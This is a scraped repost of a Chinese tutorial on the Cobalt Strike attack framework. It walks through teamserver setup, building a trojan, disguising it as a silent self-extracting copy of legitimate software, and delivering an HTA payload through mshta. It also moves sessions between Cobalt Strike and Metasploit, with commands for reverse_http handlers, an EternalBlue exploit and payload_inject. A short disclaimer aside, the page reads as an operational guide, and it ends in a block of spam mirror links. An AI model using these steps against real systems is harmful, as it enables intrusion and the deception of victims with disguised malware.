当前位置: 首页 > news >正文 一个企业可以做几个网站WordPress会员月卡年卡 news 2025/11/3 21:51:42 一个企业可以做几个网站,WordPress会员月卡年卡,服务器ip地址怎么查,asp网站文章自动更新目录 CobaltStrike简介 主要功能#xff1a; 使用注意#xff1a; 在使用CobaltStrike进行渗透测试时#xff0c;务必遵守法律法规#xff0c;并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击…目录 CobaltStrike简介 主要功能 使用注意 在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 编辑 木马的伪装自解压安装包设置 生成hta文件靶机上线 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 设置监听转移选择外部监听器 结果 msf会话传递至CS上 首先先利用msf上线一台靶机 cs设置监听 msf设置派生 结果 CobaltStrike简介 CobaltStrike简称CS是一款专业的团队作战渗透测试工具包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍 主要功能 持久化、横向移动在已经取得攻击目标控制权后CobaltStrike能够用于在目标系统中保持长期存在并进行横向移动扩大攻击范围。 流量隐藏通过其独特的技术手段CobaltStrike可以有效地隐藏网络流量使攻击行为难以被检测和追踪。 数据窃取CobaltStrike还具备数据窃取能力能够从目标系统中提取敏感信息。 使用注意 在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 在安装CobaltStrike时设备上需要部署jdk8以上的环境 安装 服务端安装在kali或者云服务器上客户端安装在Windows上 服务端安装 下列演示为在kali中安装 将CobaltStrike安装包中服务端拖进kali中 在kali桌面文件夹中找到CobaltStrike以下统称CS找到teamserver文件修改文件权限为文件添加执行权限 chmod x teamserver 执行该文件 ./teamserver 本机ip地址 自己设置的密码 后面会出现如下图所示界面 windows安装 打开CS的客户端点击如下图框起来的地方 开始会有如下弹窗 之后会有如下弹窗下列弹窗中Host填写Server端 IP地址Port设置为服务端设置端口Password设置服务端中设置密码User自己随意设置然后点击连接 然后就会出现如下图所示图片 这样就安装成功了 CS基本使用 监听器配置 在CS客户端中点击如下图所示图案 添加会话 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 木马也可以配合钓鱼攻击生成连接诱导被攻击点击 选择创建位置 测试是否成功下列图片测试成功的图片可以打开机器的文件目录并且对其进行操作 木马的伪装自解压安装包设置 选择一个木马程序和一个常用的软件使用winrar软件进行压缩选择自解压压缩格式选择的这个格式可以让后缀变为exe 点击高级,选择自解压选项 选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic 按照下图设置解压方式 选择解压方式静默解压 选择更新模式和覆盖模式 设置图标 然后点击确定就可以了然后再修改一下文件名称他会生成一个如下图所示文件上面的是正版下面的是盗版。是不是很像 上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。 生成hta文件靶机上线 点击生成hta文件 设置监听和脚本语言 设置监听端口 设置监听端口和hta文件 设置完成后会给你一串网址 复制地址在靶机上使用mshta进行运行 靶机上线成功 上线之后就可以提权进行下一步渗透了 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 msf6 use exploit/multi/handler#下面代码与你在CS中配置有关#payload对应外部监听的payloadlhost配置的是本地地址lpost要和监听器相同msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) set lhost 192.168.244.141msf6 exploit(multi/handler) set lport 8085 设置监听转移选择外部监听器 结果 会话成功转移到了msf上 msf会话传递至CS上 首先先利用msf上线一台靶机 这里用的是永恒之蓝漏洞上线的一台windows7靶机 msf6 use exploit/windows/smb/ms17_010_eternalblue #设置攻击主机 msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 192.168.244.146 #设置监听端口 msf6 exploit(windows/smb/ms17_010_eternalblue) set lport 8081 #攻击 msf6 exploit(windows/smb/ms17_010_eternalblue) run cs设置监听 msf设置派生 在MSF中exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下向该系统的另一个进程注入一个payload。 #使用该模块可以将 Metasploit 获取到的会话注入到CS中 use exploit/windows/local/payload_inject #和cs监听器保持一致 set payload windows/meterpreter/reverse_http #可以不设置但是端口不要和CS冲突了。 set prependmigrate true # msf所在主机IP set lhost xxxx #CS上的listen端口 set lport XXX #要转发的session set session 2 run 结果 会话已被cs获取 文章转载自: http://www.morning.zwdrz.cn.gov.cn.zwdrz.cn http://www.morning.lftpl.cn.gov.cn.lftpl.cn http://www.morning.gcftl.cn.gov.cn.gcftl.cn http://www.morning.mjtft.cn.gov.cn.mjtft.cn http://www.morning.nkjxn.cn.gov.cn.nkjxn.cn http://www.morning.ymwny.cn.gov.cn.ymwny.cn http://www.morning.krdmn.cn.gov.cn.krdmn.cn http://www.morning.wmlby.cn.gov.cn.wmlby.cn http://www.morning.pdxqk.cn.gov.cn.pdxqk.cn http://www.morning.rfqk.cn.gov.cn.rfqk.cn http://www.morning.nyqnk.cn.gov.cn.nyqnk.cn http://www.morning.rzmsl.cn.gov.cn.rzmsl.cn http://www.morning.nyqnk.cn.gov.cn.nyqnk.cn http://www.morning.smsjx.cn.gov.cn.smsjx.cn http://www.morning.mftdq.cn.gov.cn.mftdq.cn http://www.morning.sqhlx.cn.gov.cn.sqhlx.cn http://www.morning.dgckn.cn.gov.cn.dgckn.cn http://www.morning.wknbc.cn.gov.cn.wknbc.cn http://www.morning.rtmqy.cn.gov.cn.rtmqy.cn http://www.morning.pqcsx.cn.gov.cn.pqcsx.cn http://www.morning.diuchai.com.gov.cn.diuchai.com http://www.morning.bplqh.cn.gov.cn.bplqh.cn http://www.morning.xhkgl.cn.gov.cn.xhkgl.cn http://www.morning.wdnkp.cn.gov.cn.wdnkp.cn http://www.morning.dhpjq.cn.gov.cn.dhpjq.cn http://www.morning.pcwzb.cn.gov.cn.pcwzb.cn http://www.morning.zqsnj.cn.gov.cn.zqsnj.cn http://www.morning.xczyj.cn.gov.cn.xczyj.cn http://www.morning.lysrt.cn.gov.cn.lysrt.cn http://www.morning.xbrxk.cn.gov.cn.xbrxk.cn http://www.morning.lcbt.cn.gov.cn.lcbt.cn http://www.morning.pcgmw.cn.gov.cn.pcgmw.cn http://www.morning.xjqkh.cn.gov.cn.xjqkh.cn http://www.morning.pznqt.cn.gov.cn.pznqt.cn http://www.morning.rwlsr.cn.gov.cn.rwlsr.cn http://www.morning.tmjhy.cn.gov.cn.tmjhy.cn http://www.morning.dnbkz.cn.gov.cn.dnbkz.cn http://www.morning.srrrz.cn.gov.cn.srrrz.cn http://www.morning.ndltr.cn.gov.cn.ndltr.cn http://www.morning.plxhq.cn.gov.cn.plxhq.cn http://www.morning.wkxsy.cn.gov.cn.wkxsy.cn http://www.morning.chbcj.cn.gov.cn.chbcj.cn http://www.morning.tpnx.cn.gov.cn.tpnx.cn http://www.morning.mhpmw.cn.gov.cn.mhpmw.cn http://www.morning.kgkph.cn.gov.cn.kgkph.cn http://www.morning.bgdk.cn.gov.cn.bgdk.cn http://www.morning.twwts.com.gov.cn.twwts.com http://www.morning.cttgj.cn.gov.cn.cttgj.cn http://www.morning.rdkqt.cn.gov.cn.rdkqt.cn http://www.morning.ywgrr.cn.gov.cn.ywgrr.cn http://www.morning.nrfqd.cn.gov.cn.nrfqd.cn http://www.morning.sypby.cn.gov.cn.sypby.cn http://www.morning.hpspr.com.gov.cn.hpspr.com http://www.morning.mcwrg.cn.gov.cn.mcwrg.cn http://www.morning.tpmnq.cn.gov.cn.tpmnq.cn http://www.morning.ntzfj.cn.gov.cn.ntzfj.cn http://www.morning.chmcq.cn.gov.cn.chmcq.cn http://www.morning.xtlty.cn.gov.cn.xtlty.cn http://www.morning.qydgk.cn.gov.cn.qydgk.cn http://www.morning.wdply.cn.gov.cn.wdply.cn http://www.morning.nqmkr.cn.gov.cn.nqmkr.cn http://www.morning.rhpgk.cn.gov.cn.rhpgk.cn http://www.morning.gsyns.cn.gov.cn.gsyns.cn http://www.morning.ngkgy.cn.gov.cn.ngkgy.cn http://www.morning.lhqw.cn.gov.cn.lhqw.cn http://www.morning.jcwt.cn.gov.cn.jcwt.cn http://www.morning.mpsnb.cn.gov.cn.mpsnb.cn http://www.morning.thpzn.cn.gov.cn.thpzn.cn http://www.morning.pwsnr.cn.gov.cn.pwsnr.cn http://www.morning.xnzmc.cn.gov.cn.xnzmc.cn http://www.morning.mzwfw.cn.gov.cn.mzwfw.cn http://www.morning.wcgcm.cn.gov.cn.wcgcm.cn http://www.morning.tfrmx.cn.gov.cn.tfrmx.cn http://www.morning.dnydy.cn.gov.cn.dnydy.cn http://www.morning.wnrcj.cn.gov.cn.wnrcj.cn http://www.morning.rkyw.cn.gov.cn.rkyw.cn http://www.morning.mlfgx.cn.gov.cn.mlfgx.cn http://www.morning.qwpyf.cn.gov.cn.qwpyf.cn http://www.morning.rjznm.cn.gov.cn.rjznm.cn http://www.morning.kfstq.cn.gov.cn.kfstq.cn 查看全文 http://www.tj-hxxt.cn/news/274828.html 相关文章: 南宁保洁网站建设wordpress设计页面教程 做响应式网站制作高校二级网站建设要求 姜堰 做网站中小型网络组建 公考在哪个网站上做试题郑州网络推广培训 西宁哪家网络公司做网站响应式网站布局实例 太仓建设工程信息网站绘制网站地图 企业网站怎么扣费的网上购物十大品牌 如何针对你的网站做搜索优化西部数码网站管理助手使用教程 网站的网页建设知识ppt模板dw制作家乡网页的步骤教程 搜狗优化好的网站优购物官方网站直播 如何查询网站二级页面流量网站建设网站需要什么 建设工程招聘信息网站php的网站 好看的静态网站苏州招聘网站开发 各大高校的校园网站建设网站编程赚钱 域名注册网站那个好岳塘区建设路街道网站 沈阳网站wordpress盲注 怎么进入wordpress泰安优化关键词排名哪家合适 中国联通网站备案及ip地址备案管理要求基于云平台网站群建设 tp5做企业网站商用图片的网站 企业模板网站建设南宁市两学一做网站 网站建设简称什么东莞网站排名 奉贤网站建设哪家好现代农业建设 乡网站 起点签约的书网站给做封面吗佛山有几个区 东莞市住房和城乡建设厅网站企业seo年度 泰安做网站公司哪家比较好邮编域名做网站 pc网站平台人力资源公司网站模板下载 电脑网站设计页面北京一网数据软件有限公司 网站建设描述怎么写关键词挖掘工具爱站网 太和网站开发招聘网站常规后台 太原市网站制作公司网站制作地点
